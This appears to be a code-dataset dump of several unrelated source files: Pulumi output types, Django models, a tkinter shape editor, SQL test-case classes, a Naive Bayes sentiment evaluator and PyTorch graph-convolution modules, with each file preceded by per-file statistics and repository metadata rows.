@pulumi.output_type
class SubscriptionStatusStatuses(dict):
"""
SubscriptionPerClusterStatus defines status for subscription in each cluster, key is package name
"""
def __init__(__self__, *,
packages: Optional[Mapping[str, 'outputs.SubscriptionStatusStatusesPackages']] = None):
"""
SubscriptionPerClusterStatus defines status for subscription in each cluster, key is package name
"""
if packages is not None:
pulumi.set(__self__, "packages", packages)
@property
@pulumi.getter
def packages(self) -> Optional[Mapping[str, 'outputs.SubscriptionStatusStatusesPackages']]:
return pulumi.get(self, "packages")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class SubscriptionStatusStatusesPackages(dict):
"""
SubscriptionUnitStatus defines status of a unit (subscription or package)
"""
def __init__(__self__, *,
last_update_time: str,
message: Optional[str] = None,
phase: Optional[str] = None,
reason: Optional[str] = None,
resource_status: Optional[Mapping[str, Any]] = None):
"""
SubscriptionUnitStatus defines status of a unit (subscription or package)
:param str phase: Phase are Propagated if it is in hub or Subscribed if it is in endpoint
"""
pulumi.set(__self__, "last_update_time", last_update_time)
if message is not None:
pulumi.set(__self__, "message", message)
if phase is not None:
pulumi.set(__self__, "phase", phase)
if reason is not None:
pulumi.set(__self__, "reason", reason)
if resource_status is not None:
pulumi.set(__self__, "resource_status", resource_status)
@property
@pulumi.getter(name="lastUpdateTime")
def last_update_time(self) -> str:
return pulumi.get(self, "last_update_time")
@property
@pulumi.getter
def message(self) -> Optional[str]:
return pulumi.get(self, "message")
@property
@pulumi.getter
def phase(self) -> Optional[str]:
"""
Phase are Propagated if it is in hub or Subscribed if it is in endpoint
"""
return pulumi.get(self, "phase")
@property
@pulumi.getter
def reason(self) -> Optional[str]:
return pulumi.get(self, "reason")
@property
@pulumi.getter(name="resourceStatus")
def resource_status(self) -> Optional[Mapping[str, Any]]:
return pulumi.get(self, "resource_status")
def _translate_property(self, prop):
return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
| 49.648155 | 1,659 | 0.681598 | 17,478 | 141,249 | 5.383053 | 0.037647 | 0.022915 | 0.026944 | 0.039379 | 0.857714 | 0.841675 | 0.828782 | 0.805463 | 0.79729 | 0.781814 | 0 | 0.001764 | 0.229453 | 141,249 | 2,844 | 1,660 | 49.665612 | 0.862678 | 0.461405 | 0 | 0.745027 | 1 | 0 | 0.134726 | 0.067178 | 0 | 0 | 0 | 0.007032 | 0 | 1 | 0.180229 | false | 0 | 0.003617 | 0.067511 | 0.364075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
00f2c4d16451eb5efebcb6afd31950e7ef2a2caa | 566 | py | Python | dc_campaign_finance_data_processor/processor/models.py | codefordc/dc-campaign-finance-data-processor | c4d9d5f1d518f91bfc0321e3bb501bcf2392347b | [
"MIT"
] | 1 | 2015-09-22T23:43:46.000Z | 2015-09-22T23:43:46.000Z | dc_campaign_finance_data_processor/processor/models.py | codefordc/dc-campaign-finance-data-processor | c4d9d5f1d518f91bfc0321e3bb501bcf2392347b | [
"MIT"
] | null | null | null | dc_campaign_finance_data_processor/processor/models.py | codefordc/dc-campaign-finance-data-processor | c4d9d5f1d518f91bfc0321e3bb501bcf2392347b | [
"MIT"
] | null | null | null | from django.db import models
class Record(models.Model):
name = models.CharField(max_length=200)
clean_name = models.CharField(max_length=200)
grouped_name = models.CharField(max_length=200)
address = models.CharField(max_length=200)
clean_address = models.CharField(max_length=200)
def __str__(self):
return self.name + ' ' + self.address
class Grouping(models.Model):
name = models.CharField(max_length=200)
address = models.CharField(max_length=200)
def __str__(self):
return self.name + ' ' + self.address
| 29.789474 | 52 | 0.708481 | 74 | 566 | 5.175676 | 0.283784 | 0.274151 | 0.328982 | 0.438642 | 0.856397 | 0.856397 | 0.749347 | 0.749347 | 0.610966 | 0.610966 | 0 | 0.045356 | 0.181979 | 566 | 18 | 53 | 31.444444 | 0.781857 | 0 | 0 | 0.571429 | 0 | 0 | 0.003534 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.071429 | 0.142857 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 10 |
970627f33c9ef18d558942756094d05ec9262bb0 | 79 | py | Python | bayes_race/params/__init__.py | DaniMarts/bayesrace | 3d0d2b26dac2e33ad7e38513304cfb259abe351c | [
"MIT"
] | 23 | 2020-03-27T03:28:04.000Z | 2022-02-24T11:21:18.000Z | bayes_race/params/__init__.py | DaniMarts/bayesrace | 3d0d2b26dac2e33ad7e38513304cfb259abe351c | [
"MIT"
] | 1 | 2021-07-08T22:02:15.000Z | 2021-07-08T22:02:15.000Z | bayes_race/params/__init__.py | DaniMarts/bayesrace | 3d0d2b26dac2e33ad7e38513304cfb259abe351c | [
"MIT"
] | 17 | 2020-10-27T06:09:34.000Z | 2022-03-23T05:28:23.000Z | from bayes_race.params.f110 import F110
from bayes_race.params.orca import ORCA | 39.5 | 39 | 0.860759 | 14 | 79 | 4.714286 | 0.5 | 0.272727 | 0.393939 | 0.575758 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 0.088608 | 79 | 2 | 40 | 39.5 | 0.833333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
976608fbf08ad15e8f6e9b029472eceb514e5ee0 | 11,926 | py | Python | objects.py | clima-dev/Tyro-Engine | c06a72159838e1c2673aef617fb51b92c7e6333f | [
"Apache-2.0"
] | 5 | 2021-12-21T20:40:40.000Z | 2022-01-03T15:28:03.000Z | objects.py | clima-dev/Tyro-Engine | c06a72159838e1c2673aef617fb51b92c7e6333f | [
"Apache-2.0"
] | 2 | 2021-12-29T19:16:15.000Z | 2021-12-31T06:22:16.000Z | objects.py | clima-dev/Tyro-Engine | c06a72159838e1c2673aef617fb51b92c7e6333f | [
"Apache-2.0"
] | 2 | 2021-12-31T10:11:23.000Z | 2021-12-31T16:17:41.000Z | import tkinter as tk
import pygame
from PIL import Image as img
import PIL
from datetime import datetime
import shutil
import os
import random
class Image:
def __init__(
self,
id,
image,
canvas,
x=0,
y=0,
width=None,
height=None,
scale=1,
loaded=False,
path=None,
):
self.x = x
self.y = y
self.id = str(id)
self.scale = scale
self.name = (
image.split("/")[-1].split(".")[0] + "_" + str(id)
if not loaded
else image.split("/")[-1].split(".")[0]
)
self.canvas = canvas
self.ext = image.split("/")[-1].split(".")[-1]
self.type = "image"
file = self.name + "." + self.ext
if loaded:
self.currentDir = path
elif path != None:
self.currentDir = path + "/assets"
if not loaded:
shutil.copy(image, f"{self.currentDir}/{file}")
shutil.copy(image, f"{self.currentDir}/edited/{file}")
self.unedited = r"{currentDir}/{file}".format(
currentDir=self.currentDir, file=file
)
self.edited = r"{currentDir}/edited/{file}".format(
currentDir=self.currentDir, file=file
)
openedImage = img.open(self.unedited)
self.width, self.height = openedImage.size
self.file = tk.PhotoImage(file=self.edited)
self.path = self.unedited
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
os.rename(
self.unedited,
r"{currentDir}/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.unedited.split("/")[-1].split(".")[-1],
),
)
self.unedited = r"{currentDir}/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.unedited.split("/")[-1].split(".")[-1],
)
self.path = self.unedited
os.rename(
self.edited,
r"{currentDir}/edited/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.edited.split("/")[-1].split(".")[-1],
),
)
self.edited = r"{currentDir}/edited/{name}.{ext}".format(
currentDir=self.currentDir,
name=name,
ext=self.edited.split("/")[-1].split(".")[-1],
)
def changeX(self, x):
self.x = x
self.canvas.move(self.canvasObject, self.x, self.y)
def changeY(self, y):
self.y = y
self.canvas.move(self.canvasObject, self.x, self.y)
def changeWidth(self, width):
self.width = width
image = img.open(self.unedited)
image = image.resize(
(int(self.width * self.scale), int(self.height * self.scale))
)
image.save(self.edited)
self.file = tk.PhotoImage(file=self.edited)
def changeHeight(self, height):
self.height = height
image = img.open(self.unedited)
image = image.resize(
(int(self.width * self.scale), int(self.height * self.scale))
)
image.save(self.edited)
self.file = tk.PhotoImage(file=self.edited)
def changeScale(self, scale):
self.scale = scale
image = img.open(self.unedited)
image = image.resize(
(int(self.width * self.scale), int(self.height * self.scale))
)
image.save(self.edited)
self.file = tk.PhotoImage(file=self.edited)
def createCanvasImage(self):
self.canvasObject = self.canvas.create_image(
(self.x, self.y), anchor="nw", image=self.file
)
def delete(self):
self.canvas.delete(self.canvasObject)
os.remove(self.unedited)
os.remove(self.edited)
class Ellipse:
def __init__(
self,
id,
canvas,
x=0,
y=0,
width=75,
height=75,
color="#9c9c9c",
name="",
scale=1,
):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.id = str(id)
self.canvas = canvas
self.scale = scale
self.type = "ellipse"
self.tab = None
if name != "":
self.name = name
else:
self.name = "ellipse_" + str(id)
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeScale(self, scale):
self.scale = scale
self.width = self.width * self.scale
self.height = self.height * self.scale
def changeWidth(self, width):
self.width = width
def changeHeight(self, height):
self.height = height
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_oval(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def updateObject(self):
try:
self.canvas.delete(self.canvasObject)
except:
pass
self.canvasObject = self.canvas.create_oval(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def delete(self):
self.canvas.delete(self.canvasObject)
class Rectangle:
def __init__(
self,
id,
canvas,
x=0,
y=0,
width=75,
height=75,
color="#9c9c9c",
name="",
scale=1,
):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.id = str(id)
self.canvas = canvas
self.scale = scale
self.type = "rectangle"
self.tab = None
if name != "":
self.name = name
else:
self.name = "rectangle_" + str(id)
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeScale(self, scale):
self.scale = scale
self.width = self.width * self.scale
self.height = self.height * self.scale
def changeWidth(self, width):
self.width = width
def changeHeight(self, height):
self.height = height
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_rectangle(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def updateObject(self):
try:
self.canvas.delete(self.canvasObject)
except:
pass
self.canvasObject = self.canvas.create_rectangle(
self.x, self.y, self.x + self.width, self.y + self.height, fill=self.color
)
def delete(self):
self.canvas.delete(self.canvasObject)
class Line:
def __init__(
self,
id,
canvas,
x=0,
y=0,
width=75,
height=75,
color="#9c9c9c",
name="",
scale=1,
thickness=5,
):
self.x = x
self.y = y
self.width = width
self.height = height
self.color = color
self.id = str(id)
self.canvas = canvas
self.scale = scale
self.thickness = thickness
self.type = "line"
self.tab = None
if name != "":
self.name = name
else:
self.name = "line_" + str(id)
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeScale(self, scale):
self.scale = scale
self.width = self.width * self.scale
self.height = self.height * self.scale
def changeWidth(self, width):
self.width = width
def changeHeight(self, height):
self.height = height
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def changeThickness(self, thickness):
self.thickness = thickness
self.canvas.itemconfig(self.canvasObject, width=self.thickness)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_line(
self.x,
self.y,
self.x + self.width,
self.y + self.height,
fill=self.color,
width=self.thickness,
)
def updateObject(self):
try:
self.canvas.delete(self.canvasObject)
except:
pass
self.canvasObject = self.canvas.create_line(
self.x,
self.y,
self.x + self.width,
self.y + self.height,
fill=self.color,
width=self.thickness,
)
def delete(self):
self.canvas.delete(self.canvasObject)
class Text:
def __init__(
self,
id,
canvas,
x=0,
y=0,
text="Text",
font="Arial",
size=12,
color="#000000",
name="",
):
self.x = x
self.y = y
self.color = color
self.id = id
self.canvas = canvas
self.type = "text"
self.tab = None
self.id = str(id)
if name != "":
self.name = name
else:
self.name = "text_" + str(id)
self.text = text
self.font = font
self.size = size
def changeName(self, name, objects):
if name not in objects.keys():
self.name = name
def changeX(self, x):
self.canvas.move(self.canvasObject, x - self.x, 0)
self.x = x
def changeY(self, y):
self.canvas.move(self.canvasObject, 0, y - self.y)
self.y = y
def changeText(self, text):
self.text = text
self.canvas.itemconfig(self.canvasObject, text=self.text)
def changeColor(self, color):
self.color = color
self.canvas.itemconfig(self.canvasObject, fill=self.color)
def changeFont(self, font):
self.font = font
self.canvas.itemconfig(self.canvasObject, font=(self.font, self.size))
def changeSize(self, size):
self.size = size
self.canvas.itemconfig(self.canvasObject, font=(self.font, self.size))
def updateObject(self):
try:
self.canvas.delete(self.canvasObject)
except:
pass
self.canvasObject = self.canvas.create_text(
self.x, self.y, text=self.text, font=(
self.font, self.size), fill=self.color
)
def createCanvasObject(self):
self.canvasObject = self.canvas.create_text(
self.x, self.y, text=self.text, font=(
self.font, self.size), fill=self.color
)
def delete(self):
self.canvas.delete(self.canvasObject)
| 26.8 | 86 | 0.528258 | 1,369 | 11,926 | 4.577064 | 0.073046 | 0.065432 | 0.031599 | 0.017555 | 0.842643 | 0.805298 | 0.787265 | 0.746409 | 0.73045 | 0.719279 | 0 | 0.008497 | 0.348734 | 11,926 | 444 | 87 | 26.86036 | 0.798249 | 0 | 0 | 0.775457 | 0 | 0 | 0.027922 | 0.016351 | 0 | 0 | 0 | 0 | 0 | 1 | 0.140992 | false | 0.010444 | 0.020888 | 0 | 0.174935 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c100012687c72e9a043e72c2c6d7e3d537152647 | 2,235 | py | Python | src/test/tinc/tincrepo/ddl/default_distribution/test_create_table_default_distribution.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | src/test/tinc/tincrepo/ddl/default_distribution/test_create_table_default_distribution.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | src/test/tinc/tincrepo/ddl/default_distribution/test_create_table_default_distribution.py | lintzc/GPDB | b48c8b97da18f495c10065d0853db87960aebae2 | [
"PostgreSQL",
"Apache-2.0"
] | null | null | null | from mpp.models import SQLTestCase
class test_create_table_default_distribution(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=on
@tags CTAS HAWQ ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1, hawq: [1.3-]
'''
sql_dir = 'sql/'
ans_dir = 'expected/'
out_dir = 'out/'
class test_create_table_default_distribution_GPDB(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=on
@tags CTAS ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1
'''
sql_dir = 'sql_gpdb/'
ans_dir = 'expected/'
out_dir = 'out/'
class test_create_table_default_distribution_On(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@tags CTAS HAWQ ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1, hawq: [1.3-]
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=on
'''
sql_dir = 'sql_default_distribution_sensitive/'
ans_dir = 'expected_default_distribution_On/'
out_dir = 'out/'
class test_create_table_default_distribution_Off(SQLTestCase):
'''
testing CREATE TABLE with default distribution
@author garcic12
@created 2014-07-01 18:09:00
@description test CREATE TABLE with default distribution
@gpopt 1.510
@gucs gp_create_table_random_default_distribution=off
@tags CTAS HAWQ ORCA
@product_version gpdb: 4.3.99.99, [4.3-], 4.3.2.0ORCA1, hawq: [1.3-]
'''
sql_dir = 'sql_default_distribution_sensitive/'
ans_dir = 'expected_default_distribution_Off/'
out_dir = 'out/'
| 32.867647 | 75 | 0.657271 | 293 | 2,235 | 4.78157 | 0.167235 | 0.271235 | 0.085653 | 0.125625 | 0.950749 | 0.950749 | 0.922912 | 0.922912 | 0.922912 | 0.888651 | 0 | 0.082339 | 0.250112 | 2,235 | 67 | 76 | 33.358209 | 0.75358 | 0.53915 | 0 | 0.470588 | 0 | 0 | 0.246319 | 0.1834 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
c10e601743c5ddb576107e170bf475326045cc94 | 4,296 | py | Python | evaluate.py | sm4536/sentiment_analyser_Naive_Bayes | 50994d4f287ba97a4009e383d2f9e1d564a10b18 | [
"Apache-2.0"
] | null | null | null | evaluate.py | sm4536/sentiment_analyser_Naive_Bayes | 50994d4f287ba97a4009e383d2f9e1d564a10b18 | [
"Apache-2.0"
] | null | null | null | evaluate.py | sm4536/sentiment_analyser_Naive_Bayes | 50994d4f287ba97a4009e383d2f9e1d564a10b18 | [
"Apache-2.0"
] | null | null | null | import os
import shutil
import sys
from split_and_shuffle_data import Split_Data
datasetName = sys.argv[1]
Split_Data.splitdata(datasetName)
from bayes import Bayes_Classifier
trainDir = "training/"
testDir = "testing/"
bc = Bayes_Classifier(trainDir)
print("\n ------------------------Running the Bayes Classifier-------------------")
iFileList = []
for fFileObj in os.walk(testDir + "/"):
iFileList = fFileObj[2]
break
results = {"negative": 0, "neutral": 0, "positive": 0}
true_negatives_count = 0
true_positives_count = 0
false_negatives_count = 0
false_positive_count = 0
for filename in iFileList:
try:
fileText = bc.loadFile(testDir + filename)
classifier_result = bc.classify(fileText)
original_result = filename.split('-')[1]
except:
print(filename)
if original_result == '1' and classifier_result == 'negative':
true_negatives_count += 1
elif original_result == '1' and classifier_result != 'negative':
false_negatives_count += 1
elif original_result == '5' and classifier_result == 'positive':
true_positives_count += 1
elif original_result == '5' and classifier_result != 'positive':
false_positive_count += 1
results[classifier_result] += 1
print("\nResults Summary:")
for r in results:
print("%s: %d" % (r, results[r]))
total_positives_count = true_positives_count + true_negatives_count
total_negatives_count = false_positive_count + false_negatives_count
# Calculate and return accuracy, precision, and recall
Accuracy = 100 * total_positives_count / (total_negatives_count + total_positives_count)
precision = 100 * true_positives_count / (true_positives_count + false_positive_count)
Recall = 100 * (true_positives_count) / (true_positives_count + false_negatives_count)
fMeasure = (2 * precision * Recall) / (precision + Recall)
print("Classification Accuracy: %.2f%%" % Accuracy)
print("Classification Precision: %.2f%%" % precision)
print("Classification Recall: %.2f%%" % Recall)
print("Classification F-measure: %.2f%%" % fMeasure)
print("\n -------------------------Bayes Classifier End---------------------------")
#-----------------------------------------------------------------------
import os
from bayes_best import Bayes_Best_Classifier
trainDir = "training/"
testDir = "testing/"
bc = Bayes_Best_Classifier(trainDir)
print("\n ------------------------Running Best Bayes Classifier-------------------")
iFileList = []
for fFileObj in os.walk(testDir + "/"):
iFileList = fFileObj[2]
break
results = {"negative": 0, "neutral": 0, "positive": 0}
true_negatives_count = 0
true_positives_count = 0
false_negatives_count = 0
false_positive_count = 0
for filename in iFileList:
try:
fileText = bc.loadFile(testDir + filename)
classifier_result = bc.classify(fileText)
original_result = filename.split('-')[1]
except:
print(filename)
if original_result == '1' and classifier_result == 'negative':
true_negatives_count += 1
elif original_result == '1' and classifier_result != 'negative':
false_negatives_count += 1
elif original_result == '5' and classifier_result == 'positive':
true_positives_count += 1
elif original_result == '5' and classifier_result != 'positive':
false_positive_count += 1
results[classifier_result] += 1
print("\nBest Results Summary:")
for r in results:
print("%s: %d" % (r, results[r]))
total_positives_count = true_positives_count + true_negatives_count
total_negatives_count = false_positive_count + false_negatives_count
# Calculate and return accuracy, precision, and recall
Accuracy = 100 * total_positives_count / (total_negatives_count + total_positives_count)
precision = 100 * true_positives_count / (true_positives_count + false_positive_count)
Recall = 100 * (true_positives_count) / (true_positives_count + false_negatives_count)
fMeasure = (2 * precision * Recall) / (precision + Recall)
print("Best Classification Accuracy: %.2f%%" % Accuracy)
print("Best Classification Precision: %.2f%%" % precision)
print("Best Classification Recall: %.2f%%" % Recall)
print("Best Classification F-measure: %.2f%%" % fMeasure)
print("\n ------------Best Bayes Classifier End--------------------")
| 32.793893 | 88 | 0.679702 | 495 | 4,296 | 5.644444 | 0.145455 | 0.100215 | 0.090193 | 0.038654 | 0.907659 | 0.807445 | 0.807445 | 0.7466 | 0.7466 | 0.7466 | 0 | 0.018001 | 0.159451 | 4,296 | 130 | 89 | 33.046154 | 0.755746 | 0.040968 | 0 | 0.757895 | 0 | 0 | 0.186832 | 0.04932 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.073684 | 0 | 0.073684 | 0.189474 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
c1436219ada8335a745841ee88460ce6750ae703 | 29,085 | py | Python | Multi_gcn.py | chenjiehu/MGCN_ODA | 311a71444d6e22d4049d7356c1aa31584857006c | [
"MIT"
] | null | null | null | Multi_gcn.py | chenjiehu/MGCN_ODA | 311a71444d6e22d4049d7356c1aa31584857006c | [
"MIT"
] | null | null | null | Multi_gcn.py | chenjiehu/MGCN_ODA | 311a71444d6e22d4049d7356c1aa31584857006c | [
"MIT"
] | null | null | null | import os
os.environ['CUDA_LAUNCH_BLOCKING'] = "1"
import torch.nn as nn
from torch.nn import functional as F
import torch
import torch.nn.init as init
import numpy as np
from torch.nn.parameter import Parameter
class GraphConvolution(nn.Module):
def __init__(self, input_dim, output_dim, use_bias=True):
"""图卷积:L*X*\theta
Args:
----------
input_dim: int
节点输入特征的维度
output_dim: int
输出特征维度
use_bias : bool, optional
是否使用偏置
"""
super(GraphConvolution, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.use_bias = use_bias
self.weight = nn.Parameter(torch.Tensor(input_dim, output_dim))
if self.use_bias:
self.bias = nn.Parameter(torch.Tensor(output_dim))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
init.kaiming_uniform_(self.weight)
if self.use_bias:
init.zeros_(self.bias)
def forward(self, adjacency, input_feature):
"""邻接矩阵是稀疏矩阵,因此在计算时使用稀疏矩阵乘法
Args:
-------
adjacency: torch.sparse.FloatTensor
邻接矩阵
input_feature: torch.Tensor
输入特征
"""
support = torch.mm(input_feature, self.weight)
output = torch.mm(adjacency, support)
if self.use_bias:
output += self.bias
return output
class Graphprogate(nn.Module):
def __init__(self, input_dim, output_dim, use_bias=True):
"""图卷积:L*X*\theta
Args:
----------
input_dim: int
节点输入特征的维度
output_dim: int
输出特征维度
use_bias : bool, optional
是否使用偏置
"""
super(Graphprogate, self).__init__()
self.input_dim = input_dim
self.output_dim = output_dim
self.use_bias = use_bias
if self.use_bias:
self.bias = nn.Parameter(torch.Tensor(output_dim))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
if self.use_bias:
init.zeros_(self.bias)
def forward(self, adjacency, input_feature):
"""邻接矩阵是稀疏矩阵,因此在计算时使用稀疏矩阵乘法
Args:
-------
adjacency: torch.sparse.FloatTensor
邻接矩阵
input_feature: torch.Tensor
输入特征
"""
output = torch.mm(adjacency, input_feature)
if self.use_bias:
output += self.bias
return output
#改进四:多图GCN A+A^2最终版本
class MultiGCN_512(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(512)
self.gcn = GraphConvolution(input_dim, 512)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 512))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
x = self.gcn(A, features)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3],dim=0),dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:多图GCN A+A^2最终版本
class MultiGCN(nn.Module):
def __init__(self, input_dim, N_way):
super().__init__()
self.bn1 = nn.BatchNorm1d(input_dim)
self.bn2 = nn.BatchNorm1d(1000)
self.gcn = GraphConvolution(input_dim, 1000)
self.aifa1 = nn.Parameter(torch.Tensor(1), requires_grad=False)
self.aifa2 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.aifa3 = nn.Parameter(torch.Tensor(1), requires_grad=True)
self.weight = Parameter(torch.FloatTensor(input_dim, 1000))
self.aifa1.data.fill_(0)
self.aifa2.data.fill_(0)
self.aifa3.data.fill_(0)
self.test_N_way = N_way
self.reset_parameters_kaiming()
def forward(self,features):
A = self.MultiAdjacencyCompute(features)
x = self.gcn(A, features)
x = F.relu(self.bn2(x))
x = F.dropout(x, 0.6, training=self.training)
return x
def MultiAdjacencyCompute(self,features):
N = features.size(0)
temp = torch.norm(features.repeat(N, 1) - features.repeat(1, N).view(N * N, -1), dim=1)
adjacency_e = torch.exp(-temp.pow(2) / 9).view(N, N)
_, position = torch.topk(adjacency_e, round(N / (self.test_N_way)), dim=1, sorted=False, out=None, largest=True)
adjacency0 = torch.zeros(N, N).cuda()
D_adjacency_e = torch.zeros(N,N).cuda()
for num in range(N): #保留每行最大的K歌元素
adjacency0[num, position[num,:]] = 1
adjacency0[num,num] = 0
adjacency_e = torch.mul(adjacency0,adjacency_e)
adjacency = torch.eye(N).cuda() + adjacency_e
d = torch.sum(adjacency,dim=1)
d = d + 1
d = torch.sqrt(d)
D = torch.diag(d)
inv_D = torch.inverse(D)
adjacencyn = torch.mm(torch.mm(inv_D, adjacency),inv_D)
data = 0.5
aifa = F.softmax(torch.cat([self.aifa1,self.aifa2,self.aifa3],dim=0),dim=0)
adjacency = aifa[0]*torch.eye(N).cuda() + aifa[1]*adjacencyn + aifa[2]*torch.mm(adjacencyn,adjacencyn)
return adjacency
def reset_parameters_kaiming(self):
nn.init.kaiming_normal_(self.weight.data, a=0, mode='fan_in')
#改进四:多图GCN A+A^2最终版本,_undirected graph
